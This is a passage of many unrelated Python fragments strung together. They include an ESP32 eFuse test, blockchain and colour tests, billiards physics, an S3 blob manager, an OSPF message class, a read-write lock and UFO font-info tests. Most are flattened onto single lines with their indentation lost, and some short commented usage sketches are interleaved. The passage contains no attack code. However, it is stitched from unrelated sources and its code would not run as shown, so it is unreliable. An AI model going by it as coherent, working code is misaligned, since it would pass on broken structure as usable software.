a8 44 63 R/-')) self.espefuse_py(f'burn_key_digest BLOCK_KEY1 {S_IMAGES_DIR}/rsa_secure_boot_signing_key.pem SECURE_BOOT_DIGEST1') output = self.espefuse_py('summary -d') assert (2 == output.count(' = cb 27 91 a3 71 b0 c0 32 2b f7 37 04 78 ba 09 62 22 4c ab 1c f2 28 78 79 e4 29 67 3e 7d a8 44 63 R/-'))
class TestProcessValue(object): @pytest.fixture def setting_info(self): return {'value_type': 'choice', 'choices': {'foo': 221, 0: 170, 10: 187, 20: 204, 'multi': [17, 34]}} def test_valid_choice_int(self, setting_info): assert (choice.process_value(setting_info, 10) == [187]) def test_valid_choice_str_int(self, setting_info): assert (choice.process_value(setting_info, '10') == [187]) def test_valid_choice_str(self, setting_info): assert (choice.process_value(setting_info, 'foo') == [221]) def test_valid_choice_with_multibyte_value(self, setting_info): assert (choice.process_value(setting_info, 'multi') == [17, 34]) def test_not_valid_choice(self, setting_info): with pytest.raises(ValueError): choice.process_value(setting_info, 42)
def test_chain_get_ancestors_from_block_5(chain): genesis = chain.get_canonical_block_by_number(0) (block_1, block_2, block_3, block_4, block_5) = [chain.mine_block() for _ in range(5)] header = block_5.header assert (header.block_number == 5) assert (chain.get_ancestors(0, header) == ()) assert (chain.get_ancestors(1, header) == (block_4,)) assert (chain.get_ancestors(2, header) == (block_4, block_3)) assert (chain.get_ancestors(3, header) == (block_4, block_3, block_2)) assert (chain.get_ancestors(4, header) == (block_4, block_3, block_2, block_1)) assert (chain.get_ancestors(5, header) == (block_4, block_3, block_2, block_1, genesis)) assert (chain.get_ancestors(6, header) == (block_4, block_3, block_2, block_1, genesis)) assert (chain.get_ancestors(10, header) == (block_4, block_3, block_2, block_1, genesis))
def extractRiritranslationsBlogspotCom(item): (vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title']) if ((not (chp or vol)) or ('preview' in item['title'].lower())): return None tagmap = [('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')] for (tagname, name, tl_type) in tagmap: if (tagname in item['tags']): return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type) return False
class OptionSeriesTilemapSonificationContexttracksMappingLowpassResonance(Options): @property def mapFunction(self): return self._config_get(None) @mapFunction.setter def mapFunction(self, value: Any): self._config(value, js_type=False) @property def mapTo(self): return self._config_get(None) @mapTo.setter def mapTo(self, text: str): self._config(text, js_type=False) @property def max(self): return self._config_get(None) @max.setter def max(self, num: float): self._config(num, js_type=False) @property def min(self): return self._config_get(None) @min.setter def min(self, num: float): self._config(num, js_type=False) @property def within(self): return self._config_get(None) @within.setter def within(self, value: Any): self._config(value, js_type=False)
@jit(nopython=True, cache=const.numba_cache) def ball_linear_cushion_collision_time(rvw, s, lx, ly, l0, p1, p2, direction, mu, m, g, R): if ((s == const.spinning) or (s == const.pocketed) or (s == const.stationary)): return np.inf phi = ptmath.angle(rvw[1]) v = ptmath.norm3d(rvw[1]) u = get_u(rvw, R, phi, s) K = (((- 0.5) * mu) * g) cos_phi = np.cos(phi) sin_phi = np.sin(phi) ax = (K * ((u[0] * cos_phi) - (u[1] * sin_phi))) ay = (K * ((u[0] * sin_phi) + (u[1] * cos_phi))) (bx, by) = ((v * cos_phi), (v * sin_phi)) (cx, cy) = (rvw[(0, 0)], rvw[(0, 1)]) A = ((lx * ax) + (ly * ay)) B = ((lx * bx) + (ly * by)) if (direction == 0): C = (((l0 + (lx * cx)) + (ly * cy)) + (R * np.sqrt(((lx ** 2) + (ly ** 2))))) (root1, root2) = ptmath.roots.quadratic.solve(A, B, C) roots = [root1, root2] elif (direction == 1): C = (((l0 + (lx * cx)) + (ly * cy)) - (R * np.sqrt(((lx ** 2) + (ly ** 2))))) (root1, root2) = ptmath.roots.quadratic.solve(A, B, C) roots = [root1, root2] else: C1 = (((l0 + (lx * cx)) + (ly * cy)) + (R * np.sqrt(((lx ** 2) + (ly ** 2))))) C2 = (((l0 + (lx * cx)) + (ly * cy)) - (R * np.sqrt(((lx ** 2) + (ly ** 2))))) (root1, root2) = ptmath.roots.quadratic.solve(A, B, C1) (root3, root4) = ptmath.roots.quadratic.solve(A, B, C2) roots = [root1, root2, root3, root4] min_time = np.inf for root in roots: if (np.abs(root.imag) > const.EPS): continue if (root.real <= const.EPS): continue (rvw_dtau, _) = evolve.evolve_state_motion(s, rvw, R, m, mu, 1, mu, g, root) s_score = ((- np.dot((p1 - rvw_dtau[0]), (p2 - p1))) / np.dot((p2 - p1), (p2 - p1))) if (not (0 <= s_score <= 1)): continue if (root.real < min_time): min_time = root.real return min_time
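# --- The function above reduces each cushion line to a quadratic A*t**2 + B*t + C = 0
# and keeps the smallest real, strictly positive root whose contact point lies on the
# segment p1..p2. A standalone sketch of just the root filtering (numpy only):
import numpy as np

def smallest_valid_root(roots, eps=1e-9):
    # Discard complex and non-positive roots; return the earliest remaining time.
    best = np.inf
    for r in roots:
        if abs(np.imag(r)) > eps or np.real(r) <= eps:
            continue
        best = min(best, float(np.real(r)))
    return best

print(smallest_valid_root(np.roots([1.0, -3.0, 2.0])))  # 1.0 (roots are 1 and 2)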
_eh class HakuroukenHandler(THBEventHandler): interested = ['action_before'] execute_before = ['WineHandler', 'MomijiShieldHandler'] def handle(self, evt_type, act): if ((evt_type == 'action_before') and isinstance(act, basic.BaseAttack)): if act.cancelled: return act src = act.source if (not src.has_skill(HakuroukenSkill)): return act card = act.associated_card if (not (card.suit == Card.CLUB)): return act g = self.game if (not g.user_input([src], ChooseOptionInputlet(self, (False, True)))): return act g.process_action(Hakurouken(src, act.target)) return act
class TestLinearDisplayP3Properties(util.ColorAsserts, unittest.TestCase): def test_r(self): c = Color('color(--display-p3-linear 0.1 0.2 0.3)') self.assertEqual(c['r'], 0.1) c['r'] = 0.2 self.assertEqual(c['r'], 0.2) def test_g(self): c = Color('color(--display-p3-linear 0.1 0.2 0.3)') self.assertEqual(c['g'], 0.2) c['g'] = 0.1 self.assertEqual(c['g'], 0.1) def test_b(self): c = Color('color(--display-p3-linear 0.1 0.2 0.3)') self.assertEqual(c['b'], 0.3) c['b'] = 0.1 self.assertEqual(c['b'], 0.1) def test_alpha(self): c = Color('color(--display-p3-linear 0.1 0.2 0.3)') self.assertEqual(c['alpha'], 1) c['alpha'] = 0.5 self.assertEqual(c['alpha'], 0.5)
class TestPubSub(unittest.TestCase): def test_on_message_published_decorator(self): func = MagicMock() func.__name__ = 'testfn' decorated_func = on_message_published(topic='hello-world')(func) endpoint = getattr(decorated_func, '__firebase_endpoint__') self.assertIsNotNone(endpoint) self.assertIsNotNone(endpoint.eventTrigger) self.assertIsNotNone(endpoint.eventTrigger['eventType']) self.assertEqual('hello-world', endpoint.eventTrigger['eventFilters']['topic']) def test_message_handler(self): func = MagicMock() raw_event = _CloudEvent(attributes={'id': 'test-message', 'source': '', 'specversion': '1.0', 'time': '2023-03-11T13:25:37.403Z', 'type': 'com.example.pubsub.message'}, data={'message': {'attributes': {'key': 'value'}, 'data': 'eyJ0ZXN0IjogInZhbHVlIn0=', 'message_id': 'message-id-123', 'publish_time': '2023-03-11T13:25:37.403Z'}, 'subscription': 'my-subscription'}) _message_handler(func, raw_event) func.assert_called_once() event_arg = func.call_args.args[0] self.assertIsInstance(event_arg, CloudEvent) self.assertIsInstance(event_arg.data, MessagePublishedData) self.assertIsInstance(event_arg.data.message, Message) self.assertEqual(event_arg.data.message.message_id, 'message-id-123') self.assertEqual(event_arg.data.message.publish_time, _dt.datetime.strptime('2023-03-11T13:25:37.403Z', '%Y-%m-%dT%H:%M:%S.%f%z')) self.assertDictEqual(event_arg.data.message.attributes, {'key': 'value'}) self.assertEqual(event_arg.data.message.data, 'eyJ0ZXN0IjogInZhbHVlIn0=') self.assertIsNone(event_arg.data.message.ordering_key) self.assertEqual(event_arg.data.subscription, 'my-subscription')
class TestCalendarExport(ApiBaseTest): def setUp(self): super().setUp() self.year = datetime.date.today().year self.dates = [factories.CalendarDateFactory(category='election', start_date=datetime.datetime(self.year, 10, 1), all_day=True), factories.CalendarDateFactory(category='Roundtables', start_date=datetime.datetime(self.year, 10, 31, 2), end_date=datetime.datetime(self.year, 10, 31, 3))] def test_csv_export(self): resp = self.app.get(api.url_for(CalendarDatesExport, renderer='csv')) sio = io.StringIO(resp.data.decode()) reader = csv.DictReader(sio) rows = list(reader) assert (len(rows) == len(self.dates)) assert (set(rows[0].keys()) == set(['summary', 'description', 'location', 'start_date', 'end_date', 'category'])) def test_ics_export(self): resp = self.app.get(api.url_for(CalendarDatesExport, renderer='ics')) cal = Calendar.from_ical(resp.data) components = cal.subcomponents assert (len(components) == 2) assert (str(components[0]['CATEGORIES']) == 'election') timezone = pytz.timezone('US/Eastern') assert (components[0]['DTSTART'].dt == datetime.date(self.year, 10, 1)) assert (components[1]['DTSTART'].dt == timezone.localize(datetime.datetime(self.year, 10, 31, 2)))
class S3BlobManager(BlobManager): def __init__(self, config: Dict[(str, Any)]): super().__init__(config) self.s3_client = boto3.client(service_name=config.get('service_name', None), region_name=config.get('region_name', None), api_version=config.get('api_version', None), use_ssl=config.get('use_ssl', None), verify=config.get('verify', None), endpoint_url=config.get('endpoint_url', None), aws_access_key_id=config.get('access_key_id', None), aws_secret_access_key=config.get('secret_access_key', None), aws_session_token=config.get('session_token', None), config=Config(**config.get('config', {}))) self.bucket_name = config.get('bucket_name', None) def upload(self, local_file_path: str) -> str: file_name = os.path.basename(local_file_path) with open(local_file_path, 'rb') as f: self.s3_client.upload_fileobj(f, self.bucket_name, file_name) return file_name def download(self, remote_file_path: str, local_dir: str) -> str: file_name = os.path.basename(remote_file_path) local_file_path = os.path.join(local_dir, file_name) if (not os.path.exists(local_file_path)): lock_file_path = os.path.join(local_dir, '{}.lock'.format(file_name)) lock_file = open(lock_file_path, 'w') fcntl.flock(lock_file.fileno(), fcntl.LOCK_EX) try: if (not os.path.exists(local_file_path)): self.log.info('Downloading S3 object: {}'.format(remote_file_path)) self._get_s3_object(local_file_path, remote_file_path) except Exception as e: self.log.error('Failed to download S3 object: {}'.format(remote_file_path), exc_info=e) finally: fcntl.flock(lock_file.fileno(), fcntl.LOCK_UN) lock_file.close() if os.path.exists(lock_file_path): try: os.remove(lock_file_path) except OSError as e: self.log.warning('Failed to remove lock file: {}'.format(lock_file_path), exc_info=e) else: self.log.debug('S3 file: {} already exists at {}'.format(remote_file_path, local_file_path)) return local_file_path def _get_s3_object(self, local_path, object_key, retry_sleep_sec=5): for i in range(3): try: with open(local_path, 'wb') as f: self.s3_client.download_fileobj(self.bucket_name, object_key, f) return except Exception as e: self.log.error('Downloading object {} failed, retrying {}/3 in {} seconds'.format(object_key, (i + 1), retry_sleep_sec), exc_info=e) time.sleep(retry_sleep_sec) raise RuntimeError('Failed to download S3 file: {}'.format(object_key))
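# --- Hypothetical configuration sketch for S3BlobManager above (bucket, region and
# retry settings are placeholders, not values from the original source):
config = {
    'service_name': 's3',
    'region_name': 'us-east-1',
    'bucket_name': 'my-artifacts',
    'config': {'retries': {'max_attempts': 3}},
}
manager = S3BlobManager(config)
key = manager.upload('/tmp/model.bin')        # stored under its basename
local = manager.download(key, '/tmp/cache')   # flock-guarded, skipped if already cached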
def serialise_talent_data(save_data: list[int], talents: dict[(str, Any)]) -> list[int]: save_data = write(save_data, len(talents), 4) for cat_id in talents: cat_talent_data = talents[cat_id] save_data = write(save_data, int(cat_id), 4) save_data = write(save_data, len(cat_talent_data), 4) for talent in cat_talent_data: save_data = write(save_data, talent['id'], 4) save_data = write(save_data, talent['level'], 4) return save_data
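# --- Byte-layout sketch for the serializer above, assuming `write(data, value, n)`
# appends `value` as an n-byte little-endian integer (a stand-in for the real helper,
# not the original implementation):
def write(save_data, value, length):
    return save_data + list(int(value).to_bytes(length, 'little'))

talents = {'0': [{'id': 1, 'level': 2}]}
data = serialise_talent_data([], talents)
# 4 (group count) + 4 (cat id) + 4 (entry count) + 2 * 4 (id, level) = 20 bytes
print(len(data))  # 20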
@OSPFMessage.register_type(OSPF_MSG_LS_ACK) class OSPFLSAck(OSPFMessage): _MIN_LEN = OSPFMessage._HDR_LEN def __init__(self, length=None, router_id='0.0.0.0', area_id='0.0.0.0', au_type=1, authentication=0, checksum=None, version=_VERSION, lsa_headers=None): lsa_headers = (lsa_headers if lsa_headers else []) super(OSPFLSAck, self).__init__(OSPF_MSG_LS_ACK, length, router_id, area_id, au_type, authentication, checksum, version) self.lsa_headers = lsa_headers @classmethod def parser(cls, buf): lsahdrs = [] while buf: (kwargs, buf) = LSAHeader.parser(buf) lsahdrs.append(LSAHeader(**kwargs)) return {'lsa_headers': lsahdrs} def serialize_tail(self): return reduce((lambda a, b: (a + b)), (hdr.serialize() for hdr in self.lsa_headers))
class RWLockWriteD(RWLockableD): def __init__(self, lock_factory: Callable[([], Lockable)]=threading.Lock, time_source: Callable[([], float)]=time.perf_counter) -> None: self.v_read_count: _ThreadSafeInt = _ThreadSafeInt(lock_factory=lock_factory, initial_value=0) self.v_write_count: int = 0 self.c_time_source = time_source self.c_lock_read_count = lock_factory() self.c_lock_write_count = lock_factory() self.c_lock_read_entry = lock_factory() self.c_lock_read_try = lock_factory() self.c_resource = lock_factory() class _aReader(Lockable): def __init__(self, p_RWLock: 'RWLockWriteD') -> None: self.c_rw_lock = p_RWLock self.v_locked: bool = False def acquire(self, blocking: bool=True, timeout: float=(- 1)) -> bool: p_timeout = (None if (blocking and (timeout < 0)) else (timeout if blocking else 0)) c_deadline = (None if (p_timeout is None) else (self.c_rw_lock.c_time_source() + p_timeout)) if (not self.c_rw_lock.c_lock_read_entry.acquire(blocking=True, timeout=((- 1) if (c_deadline is None) else max(0, (c_deadline - self.c_rw_lock.c_time_source()))))): return False if (not self.c_rw_lock.c_lock_read_try.acquire(blocking=True, timeout=((- 1) if (c_deadline is None) else max(0, (c_deadline - self.c_rw_lock.c_time_source()))))): self.c_rw_lock.c_lock_read_entry.release() return False if (not self.c_rw_lock.c_lock_read_count.acquire(blocking=True, timeout=((- 1) if (c_deadline is None) else max(0, (c_deadline - self.c_rw_lock.c_time_source()))))): self.c_rw_lock.c_lock_read_try.release() self.c_rw_lock.c_lock_read_entry.release() return False self.c_rw_lock.v_read_count.increment() if (1 == self.c_rw_lock.v_read_count): if (not self.c_rw_lock.c_resource.acquire(blocking=True, timeout=((- 1) if (c_deadline is None) else max(0, (c_deadline - self.c_rw_lock.c_time_source()))))): self.c_rw_lock.c_lock_read_try.release() self.c_rw_lock.c_lock_read_entry.release() self.c_rw_lock.v_read_count.decrement() self.c_rw_lock.c_lock_read_count.release() return False self.c_rw_lock.c_lock_read_count.release() self.c_rw_lock.c_lock_read_try.release() self.c_rw_lock.c_lock_read_entry.release() self.v_locked = True return True def release(self) -> None: if (not self.v_locked): raise RELEASE_ERR_CLS(RELEASE_ERR_MSG) self.v_locked = False self.c_rw_lock.c_lock_read_count.acquire() self.c_rw_lock.v_read_count.decrement() if (0 == self.c_rw_lock.v_read_count): self.c_rw_lock.c_resource.release() self.c_rw_lock.c_lock_read_count.release() def locked(self) -> bool: return self.v_locked class _aWriter(LockableD): def __init__(self, p_RWLock: 'RWLockWriteD') -> None: self.c_rw_lock = p_RWLock self.v_locked: bool = False def acquire(self, blocking: bool=True, timeout: float=(- 1)) -> bool: p_timeout = (None if (blocking and (timeout < 0)) else (timeout if blocking else 0)) c_deadline = (None if (p_timeout is None) else (self.c_rw_lock.c_time_source() + p_timeout)) if (not self.c_rw_lock.c_lock_write_count.acquire(blocking=True, timeout=((- 1) if (c_deadline is None) else max(0, (c_deadline - self.c_rw_lock.c_time_source()))))): return False self.c_rw_lock.v_write_count += 1 if (1 == self.c_rw_lock.v_write_count): if (not self.c_rw_lock.c_lock_read_try.acquire(blocking=True, timeout=((- 1) if (c_deadline is None) else max(0, (c_deadline - self.c_rw_lock.c_time_source()))))): self.c_rw_lock.v_write_count -= 1 self.c_rw_lock.c_lock_write_count.release() return False self.c_rw_lock.c_lock_write_count.release() if (not self.c_rw_lock.c_resource.acquire(blocking=True, timeout=((- 1) if (c_deadline is None) else max(0, 
(c_deadline - self.c_rw_lock.c_time_source()))))): self.c_rw_lock.c_lock_write_count.acquire() self.c_rw_lock.v_write_count -= 1 if (0 == self.c_rw_lock.v_write_count): self.c_rw_lock.c_lock_read_try.release() self.c_rw_lock.c_lock_write_count.release() return False self.v_locked = True return True def downgrade(self) -> Lockable: if (not self.v_locked): raise RELEASE_ERR_CLS(RELEASE_ERR_MSG) self.c_rw_lock.v_read_count.increment() self.v_locked = False self.c_rw_lock.c_lock_write_count.acquire() self.c_rw_lock.v_write_count -= 1 if (0 == self.c_rw_lock.v_write_count): self.c_rw_lock.c_lock_read_try.release() self.c_rw_lock.c_lock_write_count.release() result = self.c_rw_lock._aReader(p_RWLock=self.c_rw_lock) result.v_locked = True return result def release(self) -> None: if (not self.v_locked): raise RELEASE_ERR_CLS(RELEASE_ERR_MSG) self.v_locked = False self.c_rw_lock.c_resource.release() self.c_rw_lock.c_lock_write_count.acquire() self.c_rw_lock.v_write_count -= 1 if (0 == self.c_rw_lock.v_write_count): self.c_rw_lock.c_lock_read_try.release() self.c_rw_lock.c_lock_write_count.release() def locked(self) -> bool: return self.v_locked def gen_rlock(self) -> 'RWLockWriteD._aReader': return RWLockWriteD._aReader(self) def gen_wlock(self) -> 'RWLockWriteD._aWriter': return RWLockWriteD._aWriter(self)
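# --- Usage sketch for the downgradable writer lock above: acquire exclusively, then
# downgrade to a reader without ever releasing the guarded resource in between
# (the point of the RWLockableD variant).
lock = RWLockWriteD()
wlock = lock.gen_wlock()
if wlock.acquire(timeout=1.0):
    # ... mutate shared state under exclusive access ...
    rlock = wlock.downgrade()  # still holds the resource, now as a reader
    # ... other readers may now enter concurrently ...
    rlock.release()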
class WriteFontInfoVersion2TestCase(unittest.TestCase): def setUp(self): self.tempDir = tempfile.mktemp() os.mkdir(self.tempDir) self.dstDir = os.path.join(self.tempDir, 'test.ufo') def tearDown(self): shutil.rmtree(self.tempDir) def makeInfoObject(self): infoObject = TestInfoObject() for (attr, value) in list(fontInfoVersion2.items()): setattr(infoObject, attr, value) return infoObject def readPlist(self): path = os.path.join(self.dstDir, 'fontinfo.plist') with open(path, 'rb') as f: plist = plistlib.load(f) return plist def testWrite(self): infoObject = self.makeInfoObject() writer = UFOWriter(self.dstDir, formatVersion=2) writer.writeInfo(infoObject) writtenData = self.readPlist() for (attr, originalValue) in list(fontInfoVersion2.items()): newValue = writtenData[attr] self.assertEqual(newValue, originalValue) def testGenericWrite(self): infoObject = self.makeInfoObject() infoObject.familyName = 123 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.styleName = 123 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.styleMapFamilyName = 123 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.styleMapStyleName = 123 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.styleMapStyleName = 'REGULAR' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.versionMajor = '1' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.versionMinor = '0' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.copyright = 123 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.trademark = 123 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.unitsPerEm = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.descender = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.xHeight = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.capHeight = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.ascender = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.italicAngle = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, 
info=infoObject) def testHeadWrite(self): infoObject = self.makeInfoObject() infoObject.openTypeHeadCreated = 123 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeHeadCreated = '2000-Jan-01 00:00:00' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeHeadLowestRecPPEM = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeHeadFlags = [(- 1)] writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) def testHheaWrite(self): infoObject = self.makeInfoObject() infoObject.openTypeHheaAscender = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeHheaDescender = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeHheaLineGap = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeHheaCaretSlopeRise = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeHheaCaretSlopeRun = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeHheaCaretOffset = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) def testNameWrite(self): infoObject = self.makeInfoObject() infoObject.openTypeNameDesigner = 123 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeNameDesignerURL = 123 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeNameManufacturer = 123 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeNameManufacturerURL = 123 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeNameLicense = 123 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeNameLicenseURL = 123 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeNameVersion = 123 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeNameUniqueID = 123 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = 
self.makeInfoObject() infoObject.openTypeNameDescription = 123 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeNamePreferredFamilyName = 123 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeNamePreferredSubfamilyName = 123 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeNameCompatibleFullName = 123 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeNameSampleText = 123 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeNameWWSFamilyName = 123 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeNameWWSSubfamilyName = 123 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) def testOS2Write(self): infoObject = self.makeInfoObject() infoObject.openTypeOS2WidthClass = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2WidthClass = 15 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2WeightClass = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject.openTypeOS2WeightClass = (- 50) writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2Selection = [(- 1)] writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2VendorID = 1234 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2Panose = [0, 1, 2, 3, 4, 5, 6, 7, 8, str(9)] writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2Panose = [0, 1, 2, 3] writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2Panose = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10] writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2FamilyClass = [0, str(1)] writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2FamilyClass = [1] writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() 
infoObject.openTypeOS2FamilyClass = [1, 1, 1] writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2FamilyClass = [1, 20] writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2UnicodeRanges = ['0'] writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2UnicodeRanges = [(- 1)] writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2CodePageRanges = ['0'] writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2CodePageRanges = [(- 1)] writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2TypoAscender = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2TypoDescender = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2TypoLineGap = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2WinAscent = 'abc' 